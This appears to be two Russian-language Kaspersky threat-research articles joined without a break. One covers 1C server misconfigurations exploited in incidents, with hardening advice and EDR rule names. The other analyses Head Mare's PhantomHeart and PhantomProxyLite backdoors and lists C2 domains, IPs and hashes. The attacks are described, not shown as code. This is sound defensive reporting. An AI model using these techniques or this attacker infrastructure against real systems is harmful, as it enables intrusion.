Согласно статистике реагирования на инциденты за последние годы, количество инцидентов информационной безопасности непрерывно растет. Злоумышленники постоянно совершенствуют свои техники и тактики, используемые при реализации атак. Мы все чаще сталкиваемся с техниками и тактиками, которые ранее редко встречались или не встречались вообще.

C октября 2024 года мы начали фиксировать атаки, в которых задействовались серверы с программным обеспечением 1С. При этом такие серверы могут как служить вектором проникновения злоумышленника во внутреннюю инфраструктуру, так и использоваться для повышения привилегий — в таком случае атакующие целенаправленно ищут серверы 1С во внутренней сети жертвы. В обоих случаях компрометация серверов оказывается возможна в результате серии мисконфигураций, допущенных при настройке 1С.

В этой статье мы опишем конкретные мисконфигурации, которые привели к компрометации 1С в реальных инцидентах, а также расскажем, как можно было предотвратить развитие подобных атак.

Поиск следов злоумышленника

Как уже упоминалось ранее, в рамках реагирования на инциденты мы сталкиваемся с двумя типами атак на 1С. В тех инцидентах, где серверы 1С являлись вектором проникновения в инфраструктуру, информационные базы оказывались доступными напрямую из интернета в результате человеческой ошибки или же были опубликованы намеренно, без подозрений о наличии мисконфигураций.

В случае использования злоумышленниками 1C-серверов для повышения привилегий возможность атаки обусловлена сложившимся подходом к построению безопасности, который не отвечает современным требованиям к защите инфраструктуры, а именно упором на защиту исключительно внешнего периметра. В большинстве атак, с которыми нам приходилось сталкиваться, безопасности внутренней инфраструктуры уделялся меньший приоритет. Так, мы отмечаем отсутствие разграничения доступа к ресурсам, в частности к серверам 1С внутри сети, в результате чего такие серверы оказываются доступными и с пользовательских машин, и с серверов, и с сетевого оборудования. При таком подходе злоумышленник, попав во внутреннюю сеть, может беспрепятственно найти нужные ему серверы с известными уязвимостями и мисконфигурациями.

В общем случае, если во время расследования инцидента мы понимаем, что злоумышленники использовали именно программное обеспечение 1С, нам необходимо проанализировать соответствующий сервер. Первое, на что мы обращаем внимание, — журналы регистрации 1С. В них хранится информация о событиях, происходивших в информационной базе в определенный момент времени. Для анализа инцидента особенно полезна информация о том, когда злоумышленник подключился к базе и отключился от нее, а также какую учетную запись использовал. Кроме того, по отдельным событиям в журналах регистрации можно предположить, какие действия выполнял атакующий.

Примеры событий в журнале регистрации 1С

На скриншоте выше представлено множество полезных данных для изучения действий злоумышленника: имя учетной записи, с помощью которой был получен доступ к информационной базе, а также имя компьютера, откуда было инициировано подключение. Отметим, что в журналах регистрации 1С записывается именно имя компьютера, а не его IP-адрес, что часто осложняет расследование инцидента.

Кроме того, в журнале регистрации мы видим, что при работе внешней обработки произошла ошибка с подстрокой 1C_SHELL, что прямо указывает на активность злоумышленников. Для дальнейшего анализа нам нужно ответить на следующие вопросы: как злоумышленник выяснил имя целевой информационной базы, имя пользователя для подключения и его пароль. Далее в статье мы разберем эти вопросы, выясним, что такое внешняя обработка и какие меры следует предпринять, чтобы не допустить реализацию любого из этапов описанной атаки.

В случае использования 1С для повышения привилегий злоумышленники часто уже закреплены в скомпрометированной инфраструктуре в точке проникновения. Тенденция такова, что в качестве закрепления злоумышленники выбирают различные утилиты для сетевого туннелирования. Сканирование внутренней сети и поиск серверов 1С осуществляются при наличии у злоумышленника подключения через туннель. Тогда в журналы регистрации 1С, как в целом и в любые другие журналы ОС Windows, в большинстве случаев попадет не имя легитимной системы из инфраструктуры жертвы, с которой фактически было инициировано подключение, а имя системы злоумышленника, с которой он подключался к внутренней сети. Скомпрометированную машину в таком случае можно попытаться найти различными способами в зависимости от конкретной ситуации: IP-адрес системы при определенных условиях может попасть в журналы ОС Windows или сохраниться в журналах сетевых соединений, если такие имеются. В ходе расследований мы регулярно встречаем в журналах имена систем, отсутствующих в инфраструктуре организации. Например, на скриншоте выше мы видим, что подключение производилось с системы DESKTOP-9QVS1BH — это стандартное имя компьютера, которое в большинстве случаев не соответствует принципам унифицированного именования устройств в организации.

Виды мисконфигураций

Получение списка информационных баз

Как злоумышленник может узнать имена информационных баз? Во всех расследованных нами инцидентах, в которых злоумышленникам удалось найти доступный сервер 1С внутри инфраструктуры, они могли подключиться к консоли администрирования кластера серверов без аутентификации. Получив доступ к консоли, злоумышленники могли просматривать список информационных баз 1С, а также управлять кластером: создавать новые базы, удалять имеющиеся и т. д.

Консоль администрирования кластера серверов 1С

• Рекомендация: консоль администрирования кластера серверов 1С должна быть доступна только аутентифицированным пользователям. Важно сразу после установки создать администратора кластера с надежным паролем.

Получение списка пользователей

Следующий этап атаки после получения злоумышленником имен информационных баз в кластере 1С — попытка подключения к ним. В результате еще одной мисконфигурации на панели входа в 1С злоумышленник может увидеть раскрывающийся список пользователей базы, что упрощает дальнейшее развитие атаки.

Раскрывающийся список пользователей на панели входа в 1С

• Рекомендация: при добавлении нового пользователя в базу 1С по умолчанию выставляется флаг «Показывать в списке выбора». Этот флаг необходимо снимать — тогда пользователь не будет отображаться в раскрывающемся списке на панели входа. Проверить эту настройку можно через режим «Конфигуратор» в разделе «Администрирование» -> «Пользователи».

Парольная аутентификация

Чтобы подключиться к информационной базе, необходимо указать имя пользователя и пароль. В большинстве инцидентов, которые мы расследовали, злоумышленники с легкостью находили возможность подключения к базам, не зная пароля от учетной записи. Нам известны две мисконфигурации, позволяющие подключаться к базе без пароля, которыми активно пользуются злоумышленники.

Вариант 1. Для пользователя настроена аутентификация средствами 1С, однако при создании учетной записи поле Password было оставлено пустым. В результате вход в систему для этого пользователя будет осуществляться с пустым паролем, то есть без ввода пароля вообще. В свойствах пользователя это выглядит следующим образом:

Пустое поле пароля в свойствах пользователя 1С

Вариант 2. Для пользователя настроена доменная аутентификация. Однако по умолчанию при создании пользователя устанавливается флаг, включающий аутентификацию средствами 1С с пустым полем Password. Соответственно, для такой учетной записи будет доступно два варианта аутентификации: с доменной учетной записью и средствами 1С с пустым паролем. Далее представлены свойства пользователя с описанной мисконфигурацией:

Пустое поле пароля в свойствах пользователя 1С при включенной доменной аутентификации

• Рекомендация: важно разработать эффективную парольную политику и обеспечить ее соблюдение. Базовые требования к паролям можно задать при помощи штатных средств 1С.
  Установите флаг «Проверка сложности паролей пользователей» в разделе «Администрирование» -> «Параметры информационной базы». Этот параметр устанавливает ряд требований к паролям. Длина должна быть не менее семи символов; пароль должен содержать не менее трех типов символов из следующего списка: заглавные буквы, строчные буквы, цифры, специальные символы; пароль не должен совпадать с именем для входа. Такой флаг как минимум позволит избежать установки пустых паролей для новых пользователей. Мы рекомендуем включать эту настройку сразу после установки программного обеспечения 1С, чтобы избежать появления в информационной базе учетных записей с пустым паролем (например, тестовых). Если установить флаг «Проверка сложности паролей пользователей» позднее, стоит произвести ревизию имеющихся учетных записей и установить надежный пароль для тех пользователей, у кого он отсутствует.

Необходимо также подчеркнуть, что само по себе наличие пароля не является надежным средством защиты от несанкционированного доступа. Так, использование простых паролей представляет собой потенциальную угрозу брутфорс-атаки, то есть перебора паролей злоумышленником в поисках пользователя с легко угадываемым паролем. Иногда в исследованных нами инцидентах активность злоумышленника попадала в поле зрения DLP-системы: судя по ее данным, злоумышленник явно пытался вручную перебирать простые и короткие пароли.

• Рекомендация: задайте значения для полей «Максимальное количество неуспешных попыток аутентификации» и «Длительность блокировки при превышении количества неуспешных попыток аутентификации» в разделе «Администрирование» -> «Параметры информационной базы». Например, можно задать их следующим образом: не более пяти неуспешных попыток аутентификации и 1 минута блокировки при превышении этого количества. Выбор таких значений значительно снизит риски брутфорс-атаки.

Избыточные привилегии

Одной из самых надежных практик в области информационной безопасности является принцип наименьших привилегий, и настройка серверов 1С не является исключением.

К примеру, зачастую рядовому бухгалтеру не требуются права администратора базы. Стоит отметить, что в ходе расследований нам встречались скомпрометированные информационные базы, где до 96% пользователей имели права администратора. Администратор базы имеет право на управление пользователями и их ролями, а значит, в случае компрометации такой учетной записи злоумышленник сможет выдать себе недостающие права и внести изменения, необходимые для развития атаки.

• Рекомендация: выдавайте права пользователям, руководствуясь принципом наименьших привилегий. Права администратора базы необходимо выдавать только администратору.

Вредоносные внешние обработки

Внешние обработки — это бинарные файлы с расширением .epf, содержащие код на языке 1С. В общем случае они легитимны и предназначены для расширения функциональности конфигурации 1С без изменения ее структуры. Однако злоумышленники пользуются вредоносными внешними обработками, так называемыми 1С-шеллами, которые позволяют выполнять сторонний код на сервере с программным обеспечением 1С.

Атакующие запускают 1С-шеллы после получения доступа к информационной базе. Некоторые внешние обработки, которые мы находили в ходе расследования инцидентов, доступны для скачивания на GitHub уже более двух лет.

Например, злоумышленники часто используют внешнюю обработку, позволяющую выполнять команды на сервере, вызывать функции VBScript, читать файлы, делать SQL-запросы и т. д.

Пример вредоносной внешней обработки

Встречаются и более простые варианты, которые позволяют выполнять команды на сервере:

Пример вредоносной внешней обработки

Если запустить команду на сервере 1С через внешнюю обработку, она будет выполняться от имени учетной записи, от которой запущены службы 1С на сервере. Если для работы служб 1С используется доменная учетная запись, добавленная в группу доменных администраторов, компрометация такой учетной записи может обернуться серьезными последствиями для инфраструктуры, хотя отметим, что подобные случаи возникают крайне редко. Наиболее часто в инцидентах, которые мы расследуем, для работы служб 1С используются учетные записи с правами локальных администраторов или доменные учетные записи с привилегиями, которые позволяют быстро получить права локального администратора, что способствует быстрому развитию атаки.

Примером реализации атаки с использованием вредоносной внешней обработки является создание запланированной задачи на запуск вредоносной нагрузки.

Создание запланированной задачи

Пример вредоносной внешней обработки

Эта команда создает в планировщике Windows задачу MalwareTask, которая каждые три минуты запускает malware.exe с максимальными правами и автоматически восстанавливается, если ранее была удалена.

В Kaspersky Endpoint Detection and Response Expert эта активность детектируется следующими правилами:

• interpreter_process_spawned_by_1c_app отслеживает сеанс интерпретатора, созданный приложением 1С;
• scheduled_task_creation_via_schtasks отслеживает создание запланированной задачи;
• using_schtasks_to_create_minute_task отслеживает создание задачи планировщика, выполняющейся с периодичностью в минутах.

Детектирование в KEDR Expert

• Рекомендация: следуйте принципу наименьших привилегий. То есть при создании учетных записей право «Интерактивное открытие внешних отчетов и обработок», позволяющее работать с обработками, важно выдавать только тем пользователям, кому это действительно необходимо. Альтернативное решение — вовсе отказаться от использования обработок.
• Рекомендация: настройте профиль безопасности, в соответствии с которым процессы кластера серверов будут работать в контексте пользователей операционной системы с минимально необходимыми привилегиями.

Как настроить журналы регистрации

В ходе проведения расследований нам часто приходится сталкиваться с ситуациями, где единственным местом поиска следов активности злоумышленника оказываются именно журналы регистрации 1С. Однако в некоторых случаях запись событий в такие журналы была отключена задолго до инцидента либо фиксировался минимальный объем событий.

Важно правильно настроить журналы регистрации. Средства 1С позволяют настроить уровень детализации событий, отображаемых в журналах: можно регистрировать не только ошибки и предупреждения, но также и общую информацию в различных комбинациях. С точки зрения расследования наиболее полезным оказывается максимально подробное логирование. Его можно включить в режиме «Конфигуратор».

Настройка детализации регистрируемых событий в журналах

Также хорошей практикой является разделение журналов регистрации по периодам. В зависимости от размера базы события можно группировать с различной частотой: каждый час, день, неделю и т. д., что в случае возникновения инцидента значительно облегчит анализ действий в информационной базе и оптимизирует работу с журналами регистрации.

Настройка разделения журналов регистрации по периодам

Наконец, последним параметром оптимального логирования является период хранения журналов регистрации. Мы рекомендуем сохранять журналы за последние 6–12 месяцев: в большинстве случаев этого периода хватит на случай расследования инцидента. Более старые записи в журнале можно удалять. Тем не менее удаляемые события стоит записывать в отдельный файл, из которого в случае необходимости их можно восстановить. Это позволяют сделать штатные средства 1С.

Настройка периода хранения журналов регистрации и запись удаляемых событий в файл

Заключение

По нашим данным, продукты 1С применяют более 1 600 000 организаций. На российском рынке ERP-решений доля 1С превышает 85%. Ожидается, что эти цифры будут только расти. Таким образом, отсутствие пристального внимания к настройке программного обеспечения 1С может иметь непоправимые последствия.

Как мы отмечали ранее, мисконфигурации серверов 1С способны привести к проникновению атакующих во внутреннюю инфраструктуру или повышению привилегий. Имена информационных баз и учетных записей могут с легкостью оказаться известными, а инциденты с пустыми паролями говорят о необходимости повсеместного внедрения строгой парольной политики.

Используя вышеописанные мисконфигурации в программном обеспечении 1С, злоумышленники переходят к дальнейшему развитию атаки. В большинстве расследуемых нами инцидентов такие атаки наносили серьезный ущерб целевой инфраструктуре: они завершались шифрованием данных, удалением виртуальных машин и пр.

Для защиты серверов 1С мы настоятельно рекомендуем уделять пристальное внимание настройке параметров безопасности, разграничению доступа и повышению уровня киберграмотности сотрудников. Кроме того, стоит обеспечивать максимально возможное логирование на случай непредвиденных обстоятельств.

На серверах с программным обеспечением 1С важно обращать внимание на любые срабатывания защитных решений. Продукты «Лаборатории Касперского» обнаруживают и блокируют попытки вредоносной эксплуатации 1С при помощи компонента Behavior Detection с вердиктом PDM:Exploit.Win32.Generic. Кроме того, наши решения детектируют различные вредоносные внешние обработки, доступные на GitHub, со следующими вердиктами:

• Backdoor.Script.1CShell.*;
• HackTool.Script.1CShell.*;
• Trojan.Multi.Agent.y.

Введение

В конце 2025 – начале 2026 года мы зафиксировали заметный рост новой вредоносной активности, нацеленной на российские организации. Совокупность используемой инфраструктуры, тактик, техник и процедур (TTP) и особенностей кода указывает на связь этой кампании с проукраинской группировкой Head Mare, за деятельностью которой мы наблюдаем уже несколько лет.

Новая волна атак продемонстрировала дальнейшее развитие инструментария группировки. Ключевой находкой стал новый бэкдор PhantomHeart, который изначально распространялся в виде DLL-библиотеки, а позднее был переработан в PowerShell-скрипт. Такой переход отражает стремление Head Mare активнее применять подход Living-off-the-Land и опираться на нативные механизмы Windows, которые использовались для постэксплуатации.

Эта стратегия прослеживается и в остальном арсенале группы. В рамках текущей кампании прокси-инструмент PhantomProxyLite, характерный для атак Head Mare, также получил реализацию на PowerShell. Кроме того, мы выявили новые кастомизированные утилиты с ограниченной, узкой функциональностью, используемые для закрепления в инфраструктуре жертв и повышения привилегий.

При этом подходы к первоначальному доступу остаются во многом неизменными. Head Mare продолжает эксплуатировать уязвимость BDU:2025-10114 в программном обеспечении TrueConf Server, а в отдельных случаях по-прежнему использует фишинговые рассылки, сочетая проверенные векторы проникновения с постепенно обновляемым арсеналом.

Инструментарий группировки

PhantomHeart

PowerShell-бэкдор PhantomHeart реализует канал удаленного доступа, сочетающий HTTP-коммуникацию с C2-сервером и возможность развертывания SSH-туннеля по запросу оператора. На этапе инициализации вредоносное ПО формирует идентификатор жертвы (clientId), основанный на MAC-адресе проводного сетевого адаптера. Этот идентификатор используется как для дальнейшей коммуникации с C2, так и для привязки конфигурации бэкдора к конкретному хосту.

Список управляющих серверов хранится в зашифрованном виде и расшифровывается во время выполнения. Для этого используется алгоритм AES-128-CBC, при этом ключ генерируется на основе MAC-адреса зараженной системы. Такой подход затрудняет статический анализ образцов и извлечение адресов C2-серверов без запуска кода в целевой среде.

После расшифровки адресов PhantomHeart переходит в основной цикл взаимодействия с C2. Для обмена данными используются HTTP POST-запросы, содержащие вредоносную нагрузку в формате JSON. Запросы отправляются через встроенные PowerShell-механизмы. Для каждой целевой системы собирается базовая информация: имя компьютера (hostname), домен (domain), внешний IP-адрес (publicIp) и уникальный идентификатор (clientId). Эти данные отправляются в POST-запросе на /api/clients/register.

Пример POST-запроса:

Получив первичную информацию о новом зараженном хосте, бэкдор в дальнейшем периодически отправляет heartbeat-запросы на /api/clients/heartbeat, проверяя активность хоста и готовность к приему команд:

Ключевой функциональной возможностью PhantomHeart является развертывание SSH-туннеля по указанию C2-сервера. При получении соответствующих параметров (включая адрес сервера, имя пользователя, порт и параметры проброса) бэкдор запускает клиент OpenSSH. Затем PhantomHeart динамически создает временный конфигурационный файл в директории C:\Windows\Temp\config и инициирует сессию с использованием удаленного проброса портов (remote port forwarding). Это позволяет оператору получить устойчивый удаленный доступ к скомпрометированной системе.

Бэкдор также предусматривает возможность завершения работы по команде и обработку ошибок. В случае получения команды на отключение или при возникновении проблем с соединением PhantomHeart завершает SSH-сессию, удаляет временные артефакты и уведомляет C2-сервер на /api/clients/ssh-terminated.

Отдельного внимания заслуживает обнаруженный механизм закрепления. В одной из атак бэкдор запускался через планировщик задач под видом легитимного скрипта обновления, размещенного в директории средства удаленного администрирования LiteManager. Использование пути $ProgramFiles\LiteManager Pro - Server\rom\check-update.ps1 указывает на попытку замаскировать вредоносную активность под штатную работу легитимного программного обеспечения.

PhantomProxyLite: PowerShell-реализация

В ходе анализа инструментария, используемого Head Mare в рамках новой кампании, мы обнаружили, что группировка переработала ранее известный инструмент PhantomProxyLite, реализовав его в виде PowerShell-скрипта.

В предыдущих кампаниях PhantomProxyLite представлял собой скомпилированный бинарный файл, функционировавший в виде фонового сервиса с именем SSHService. Этот инструмент отвечал за установку и поддержание обратного SSH-туннеля к C2-инфраструктуре. При первом запуске он генерировал постоянный порт для обратного подключения, сохранял его в реестре Windows по пути HKLM\SOFTWARE\SSHService и обеспечивал закрепление за счет регистрации сервиса.

Новая версия PhantomProxyLite сохраняет ту же архитектурную логику, но реализована полностью на PowerShell. Вместо фонового сервиса закрепление теперь осуществляется через задачу планировщика Windows с тем же именем, SSHService, настроенную на запуск при старте системы от имени учетной записи SYSTEM. При этом бэкдор по-прежнему использует тот же ключ реестра для хранения постоянного порта, динамически создает временный конфигурационный файл SSH-туннеля в каталоге C:\Windows\Temp и запускает ssh.exe для установления обратного туннеля.

Переход к скриптовой реализации показывает, что Head Mare все чаще опирается на встроенные средства Windows. Таким образом группа адаптирует инструмент под конкретные условия, реализуя вредоносную функциональность без использования отдельных скомпилированных компонентов.

Для автоматизации развертывания и закрепления новой версии PhantomProxyLite группировка использует вспомогательный PowerShell-скрипт Create-SSHServiceTask.ps1. Ниже приведен пример содержимого скрипта:

Этот скрипт настраивает задачу планировщика, которая запускает основной PowerShell-бэкдор при старте системы. Задача запускается с максимальными привилегиями от имени SYSTEM и дополнительно снабжена параметрами устойчивости, включая автоматический перезапуск в случае сбоев.

При обнаружении уже существующей задачи с тем же именем скрипт удаляет ее и создает новую, гарантируя согласованную конфигурацию и предотвращая конфликты. После регистрации задача немедленно запускается, активируя бэкдор без ожидания следующей перезагрузки системы.

Другие инструменты

Помимо PowerShell-бэкдоров, группа Head Mare также расширила вспомогательный инструментарий, используемый в рамках постэксплуатации. В ходе расследования мы выявили новые утилиты и скрипты, предназначенные для автоматизации типовых задач на уровне хоста, включая закрепление в системе, управление привилегиями и организацию сетевого доступа.

Одним из таких инструментов является исполняемый файл adduser.exe, разработанный для быстрой модификации локальной конфигурации системы. Эта утилита выполняет ограниченный, но важный набор действий: создает локальную учетную запись с именем user, добавляет ее в группу локальных администраторов и отключает механизм User Account Control (UAC). Использование подобного инструмента позволяет оператору получить административный доступ к системе без необходимости подключения вручную или использования встроенных средств управления пользователями.

Детонация образца в Kaspersky Research Sandbox

В совокупности эти утилиты не представляют собой технически сложные разработки, однако их интеграция в общую цепочку атаки подчеркивает ориентацию Head Mare на автоматизацию, повторяемость и снижение операционной нагрузки на этапе постэксплуатации. Это говорит о том, что группа стремится проводить большее количество атак.

Жертвы

Новая волна активности Head Mare затронула широкий спектр российских организаций. Зафиксированные атаки пришлись как на организации из государственного сектора, так и на компании из строительной и промышленной отраслей.

Атрибуция

Описанную волну атак мы с высокой степенью уверенности связываем с проукраинской группировкой Head Mare. Основанием для этого служат технические и операционные признаки, уже хорошо знакомые нам по предыдущим кампаниям группы.

• Прежде всего, вектор первоначального доступа совпадает с тем, что мы фиксировали в прошлых атаках. В этой кампании вновь используется эксплуатация уязвимости BDU:2025-10114 в TrueConf Server — эту технику группа Head Mare активно применяет с прошлого года.

  В ходе анализа мы зафиксировали множественные примеры успешной эксплуатации, включая внедрение команд PowerShell через параметры запуска tc_server.exe, что позволяло атакующим выполнять произвольный код в целевых системах:
  

• Дополнительным индикатором, способствующим атрибуции, является повторное использование инфраструктуры. В рамках текущей кампании атакующие задействовали C2-адреса, которые ранее уже фигурировали в активности Head Mare:

  cyberposi[.]space
  nexaguard[.]space
  safebloom[.]space
  optivault[.]space
  brightshield[.]space
  analytisec[.]space
  shieldify[.]online
  195.133.32[.]213
  188.127.227[.]46

• Группировка не изменила и подход к целям: как география атак, так и выбор отраслей повторяют ее предыдущие кампании.
• Наконец, используемый инструментарий демонстрирует знакомый для Head Mare подход. Обнаруженные PowerShell-версии PhantomProxyLite представляют собой переработку ранее применявшегося бинарного бэкдора: изменилась форма реализации, но сама логика использования инструмента осталась прежней.

Совокупность этих факторов позволяет уверенно отнести описанную активность к группировке Head Mare.

Выводы

Текущая активность Head Mare показывает, что группировка продолжает перестраивать свой инструментарий и цепочки атак. Появление нового бэкдора PhantomHeart и все более активное использование средств автоматизации делают такие операции проще в повторении и масштабировании. За счет этого Head Mare может регулярно проводить новые кампании и продолжает представлять ощутимую угрозу для российских организаций из различных отраслей.

Продукты «Лаборатории Касперского» детектируют описанное в статье вредоносное ПО со следующими вердиктами: HEUR:Trojan-Ransom.Win32.*, not-a-virus:NetTool.Win32.NetScan.*, HEUR:Trojan.Win32.Generic, not-a-virus:NetTool.Win64.MicroSocks.*, Backdoor.PowerShell.Agent.gen, Trojan.PowerShell.Agent.*.

Индикаторы компрометации

Дополнительные индикаторы компрометации доступны клиентам сервиса аналитических отчетов Kaspersky Crimeware Intelligence Reporting. Для получения более подробной информации свяжитесь с нами по адресу [email protected].

Хэши файлов

PhantomHeart
F6FE88CF5674D4D032646E3C5C1A5A01
137E563355D1D83E822B80956F589BF8
186F7F0F64358C1AFFD314BE1406225E
1C66D261808114A48E444666A7BAAD38
26D134F56489B7703B403276D75FB016
54E128B861C5052666A86B470E34C33B
A484661D7A2897365E07A2D79E4F4D60
E26AAFB5D3FEC5DCD8C1AAD73CB02414
02BE93F46743FF293644433089A47BBC
5FE4A4CA52319B97196183A47FB17BF8
A50B645C933E3C2895397401A0DC46B9
AD85916797773E3191FD8AB45111F3EF
B251FFC6665A3F6BB63728BE76F2DE0C
23E91B4D5A65403479648DDE7C1A92E3
BE6ED8287B22F91D0F8A66E901393D13

PhantomProxyLite (PowerShell версия)
17EB5CC5EF4B7CC6A0D7233AF97DA29E
8F72E0DD349BB32A100D19BAD260BD2E
BF73D5F96394BF47D329B848D58BF9FE
76CDCFEA6BE9B7172B2C3A5FAE59DA09
DC41C9267A636DA409BBF60F802B8E62
5427BA3EF8BD2C4E57B33DD039CE6EA3

Create-SSHServiceTask.ps1
79B11A56618CFB43953B29B71406C1EE

MicroSocks
2DC957CF3F0F6C5C5E6FC865F8BBCE42 micro.exe

Mimikatz
29EFD64DD3C7FE1E2B022B7AD73A1BA5

Advanced Port Scanner
6A58B52B184715583CDA792B56A0A1ED Advanced_Port_Scanner_2.5.3869.exe

LockBit
8F1EF9E7EA31B20FA5EBB4E747003B5C avp.exe

Пути, по которым был найден PhantomHeart
c:\Windows\ime
c:\Windows\pla
c:\Windows\System32\ime
c:\Windows\inf\lsm
c:\windows\ime
c:\Windows\guard\gshared
c:\Windows\migration
c:\Windows\System32
c:\Windows\guard
c:\Windows\inf
c:\csc
c:\Windows\tapi
c:\Windows\csc
c:\Windows\System32\com
c:\Windows\skb\languagemodels
c:\Windows\vss
c:\Windows\System32\timecontrolsvc
c:\Windows\System32\mrt

PhantomHeart
aegissecurity[.]online
defentry[.]online
tastehub[.]online
netvion[.]online
cryptara[.]online
optivault[.]space
infoseon[.]online
msnetsec[.]space
fortisec[.]online
vitalock[.]space
cyvantis[.]online

PhantomProxyLite (PowerShell версия)
195.133.32[.]213
31.56.227[.]61
31.58.137[.]197
31.56.48[.]178
193.176.153[.]162
188.127.254[.]233
94.183.188[.]166
80.66.81[.]13
213.232.204[.]111
31.56.227[.]100

Другие релевантные домены
unlikeu[.]org
hostinfo-service[.]info

Другие релевантные IP
176.98.189[.]101
178.255.127[.]65